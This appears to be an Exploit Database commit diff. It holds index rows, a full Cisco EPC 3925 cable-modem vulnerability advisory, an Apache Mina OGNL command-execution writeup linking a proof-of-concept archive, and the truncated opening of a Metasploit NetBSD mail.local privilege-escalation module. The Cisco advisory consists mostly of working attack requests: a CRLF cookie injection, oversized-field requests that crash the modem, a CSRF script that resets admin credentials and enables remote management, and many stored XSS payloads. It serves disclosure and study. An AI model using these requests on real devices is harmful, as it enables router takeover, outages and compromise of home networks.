40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit",2016-08-19,"Shadow Brokers",hardware,remote,0
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution",2016-08-19,"Shadow Brokers",hardware,webapps,0
40277,platforms/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",cgi,webapps,80
40278,platforms/php/webapps/40278.txt,"tcPbX - (tcpbx_lang) Local File Inclusion",2016-08-19,0x4148,php,webapps,0
40278,platforms/php/webapps/40278.txt,"tcPbX - 'tcpbx_lang' Local File Inclusion",2016-08-19,0x4148,php,webapps,0
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0

Can't render this file because it is too large.

695
platforms/asp/webapps/40383.txt Executable file
View file

@ -0,0 +1,695 @@
# Title: Cisco EPC 3925 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco EPC3925 (EuroDocsis 3.0 2-PORT Voice Gateway)
# Date: 15.09.2016
# Author: Patryk Bogdan
========
Vulnerability list:
1. HTTP Response Injection via 'Lang' Cookie
2. DoS via 'Lang' Cookie
3. DoS in Wireless Client List via 'h_sortWireless'
4. (Un)authorized modem restart (Channel Selection)
5. CSRF
6. Stored XSS in SMTP Settings (Administration -> Reportning)
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)
========
1. HTTP Response Injection
It is able to inject arbitrary data into device memory via 'Lang' cookie,
additional data will be stored until modem restart and will be returned with every http response.
#1 - Request:
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Cookie: Lang=en; SessionID=171110
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
(...)
#2 - Request:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: pwned
Set-Cookie: SessionID=219380
Content-Length: 1398
(...)
2. DoS via 'Lang' Cookie
Modem crashes when cookie variable in request is too long.
#1 - Request (crash via http injection):
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
username_login=aaa&password_login=bbb&LanguageSelect=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Docsis_system.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Set-Cookie: SessionID=163190
Content-Length: 18743
(...)
At this point modem crashes:
C:\Users\Patryk>ping -n 10 192.168.100.1
Pinging 192.168.100.1 with 32 bytes of data:
Request timed out.
Request timed out.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
(...)
DoS can be also executed with single HTTP request, like this:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/
Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
Connection: close
3. DoS in Wireless Client List via 'h_sortWireless'
Modem crashes when variable for POST parameter 'h_sortWireless' is too long.
#1 - Request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/WClientMACList.asp
Cookie: Lang=en; SessionID=71750
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/WClientMACList.asp
Content-type: text/html
Connection: close
( ... crash ... )
4. (Un)authorized channel Selection
On Cisco 3925 unauthorized user can edit device channel settings and restart the modem. Such functionality should be available only for logged users, for example it's disabled on EPC 3928.
5. CSRF
There is no prevention against CSRF attacks, attacker can for example change admin credentials and enable remote managment in single request.
PoC:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.100.1/goform/Administration", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=admin&sysPasswd=newpass&sysConfirmPasswd=newpass&remote_management=enable&http_wanport=8080&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=enable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</script>
6. Stored XSS in Administration -> Reporting
#1 - Request:
POST /goform/Log HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
email_enable=enable&smtp_server=%22+onmouseover%3Dalert%281%29+x%3D%22y&email_for_log=%22+onmouseover%3Dalert%282%29+x%3D%22y&SmtpUsername=%22+onmouseover%3Dalert%283%29+x%3D%22y&SmtpPassword=aaa&save=Save+Settings&h_email_enable=enable
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Log.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Log.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 6454
(...)
<TD>
<input type="text" name="smtp_server" maxlength="255" size="30" value="" onmouseover=alert(1) x="y" />
</TD>
</TR>
<tr>
<TD>
<script language="javascript" type="text/javascript">dw(va_log_email3);</script>
</TD>
<TD>
<input type="text" name="email_for_log" maxlength="255" size="30" value="" onmouseover=alert(2) x="y"/>
</TD>
</TR>
<tr>
<TD>
<script language="javascript" type="text/javascript">dw(msg_smtp_username);</script>
</TD>
<TD>
<input type="text" name="SmtpUsername" maxlength="255" size="30" value="" onmouseover=alert(3) x="y" />
</TD>
</TR>
(...)
7. Stored XSS in User Name (Administration -> Managment / Setup -> Quick Setup)
#1 - Request:
POST /goform/Administration HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 746
connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sysPasswd=aaa&sysConfirmPasswd=aaa&remote_management=disable&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=disable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Quick_setup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 34779
(...)
<tr>
<td nowrap>
<script language="javascript" type="text/javascript">dw(va_local_access2);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</td>
</tr>
(...)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
#1 - Request:
POST /goform/Rg_UserSetup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
NewUser=user onmouseover=alert('XSS')&Btn_AddUser=Add+User&AddUser=1&UserList=Default&RemoveUser=0&UserConfigChanged=0
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_UserSetup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_UserSetup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9706
(...)
<select onchange="submit();" name="UserList">
<option value=Default >1. Default<option value=user onmouseover=alert('XSS') selected>2. user onmouseover=alert('XSS
</select>
(...)
9. Stored XSS in ToD Filter
#1 - Request:
POST /goform/Rg_TodFilter HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
TodClient=<script>alert('XSS')</script>&TodAdd=Add&addTodClient=1&ToDComputers=No+filters+entered.&removeTodClient=&StartHour=12&StartMinute=00&StartAmPm=1&EndHour=12&EndMinute=00&EndAmPm=1
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_TodFilter.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_TodFilter.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9140
(...)
<select name="ToDComputers" onChange="submit();">
<option value=0 selected>1. <script>alert('XSS')</script>
</select>
(...)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
NewContentRule=<script>alert('XSS')</script>&AddRule=Add+Rule&AddContentRule=1&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=&AllowedDomainAction=0&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 11126
(...)
<select name="ContentRules" onChange="submit();">
<option value=0 selected>1. Default<option value=1 >2. <script>alert('XSS')</script>
</select>
(...)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
NewContentRule=&AddContentRule=&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&AddAllowedDomain=Add+Allowed+Domain&AllowedDomainAction=1&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10741
(...)
<select name="AllowedDomainList" size=5>
<option value="1"><script>alert('XSS')</script>
</select>
(...)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
#1 - Request:
POST /goform/Quick_setup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Password=&PasswordReEnter=&setup_wifi_enable=enable&ssid=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&security_mode=psk2_mixed&wpa_enc=tkip%2Baes&wpa_psk_key=231503725&radius_ip_1=0&radius_ip_2=0&radius_ip_3=0&radius_ip_4=0&keysize=64&tx_key=1&save=Save+Settings&h_setup_wifi_enable=enable&h_security_mode=psk2_mixed&h_wpa_enc=tkip%2Baes&qs_wds_setting=disable&UserId=
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Wireless.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 51653
(...)
<tr>
<td>
<B><script language="javascript" type="text/javascript">dw(vwnetwork_name);</script></B>
</td>
<td colspan="2">
<script>alert('XSS')</script>
</td>
</tr>
(...)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
#1 - Request:
POST /goform/Setup_DDNS HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
DdnsService=0&DdnsUserName=user" onmouseover=alert('XSS_1') x="&DdnsPassword=aaa x="&DdnsHostName=host" onmouseover=alert('XSS_2') x="y&save=Save+Settings
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Setup_DDNS.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Setup_DDNS.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 5738
(...)
<td>
<input name="DdnsUserName" type="text" size="16" maxlength="64" value="user" onmouseover=alert('XSS_1') x="" />
</td>
(...)
<td>
<input name="DdnsHostName" type="text" size="32" maxlength="256" value="host" onmouseover=alert('XSS_2') x="y" />
</td>
(...)
14. Stored XSS in Adv. VPN Setup (Security -> VPN -> Advanced Settings)
#1 - Request:
POST /goform/vpn_adv HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 286
NegotiationMode=0&LocalIdentityType=2&LocalIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&RemoteIdentityType=2&RemoteIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&Phase1Encryption=2&Phase1Authentication=1&Phase1DhGroup=0&Phase1SaLifetime=28800&Phase2DhGroup=0
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/vpn_adv.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /vpn_adv.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10179
(...)
<td>
<input type="radio" name="LocalIdentityType" value="2" onClick="LocalIdentityTypeClicked();" />
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
<input type="text" name="LocalIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
</td>
(...)
<tr>
<td>
<input type="radio" name="RemoteIdentityType" value="2" onClick="RemoteIdentityTypeClicked();">
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
<input type="text" name="RemoteIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
</td>
</tr>
(...)

View file

@ -0,0 +1,33 @@
Apache Mina 2.0.13 - Remote Command Execution
Abstract
Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its constructor takes into parameter one OGNL expression. Then this expression is executed when the method “find” is called. This class seems to be only used in the JMX MINA component “IoServiceMBean”. When the IOServiceMBean is exposed trough JMX it is possible to abuse the function to execute an arbitrary command on the server.
Description
The function “find” in the “IoSessionFinder” class executes an arbitrary OGNL expression (Ognl.getValue(….)) defined in its constructor.
Conclusion
This vulnerability shows that Expression languages vulnerabilities are still present in Java libraries and can have a big impact even if it is in this case the vulnerability can only exploited in specific conditions.
Regarding the fix, the Apache Mina team didn't request a CVE neither acknowledged the vulnerability but I confirm that the vulnerability is fixed is the last version.
Timelines
30/03/2016: First email to disclose the vulnerability to the Apache Security Team
31/03/2016: Acknowledgment from the Apache Mina team for the email reception and saying the vulnerability is under investigation
21/05/2016: Email from the Apache Mina saying that they look for possible remediations
12/08/2016: Email from the Apache Mina suggesting a solution
29/08/2016: Email from my side saying that the remediation looks good
30/08/2016: Apache Mina team published the new version fixing the issue.
PS: I have included two archives containing the two proofs of concept.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40384.zip

View file

@ -0,0 +1,330 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'NetBSD mail.local Privilege Escalation',
'Description' => %q{
This module attempts to exploit a race condition in mail.local with SUID bit set on:
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
NetBSD 6.1 - 6.1.5
NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # Module
'akat1' # Discovery
],
